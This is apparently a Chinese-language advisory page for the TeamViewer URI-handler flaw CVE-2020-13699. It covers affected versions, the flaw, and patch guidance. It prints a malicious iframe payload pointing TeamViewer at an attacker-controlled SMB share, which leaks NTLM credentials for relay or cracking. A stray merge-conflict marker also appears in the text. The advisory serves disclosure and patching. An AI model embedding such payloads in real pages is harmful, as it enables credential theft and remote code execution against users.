跳转至

TeamViewer 远程代码执行漏洞(CVE-2020-13699)

最后更新于:2020-09-23 15:53:05

影响版本

TeamViewer < 8.0.258861 TeamViewer < 9.0.28860 TeamViewer < 10.0.258873 TeamViewer < 11.0.258870 TeamViewer < 12.0.258869 TeamViewer < 13.2.36220 TeamViewer < 14.2.56676 TeamViewer < 15.8.3

漏洞描述

TeamViewer存在未引用的搜索路径或元素的安全缺陷,由于应用程序没有正确引用它的自定义URI处理程序,当安装有TeamViewer的易受攻击版本的系统访问恶意创建的网站时,可能会被利用。 攻击者可以使用精心制作的URL

(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')
<<<<<<< HEAD

img img 将恶意iframe嵌入网站中,从而启动TeamViewer Windows桌面客户端并强制其打开远程SMB共享。 Windows将在打开SMB共享时,执行NTLM身份验证,并且可以转发该请求(使用如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)

修复建议

针对此漏洞官方已在8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3版本中修复。 请受影响的用户参考以下链接安装补丁更新:https://www.teamviewer.com/en/download/previous-versions/


最后更新: 2021-02-19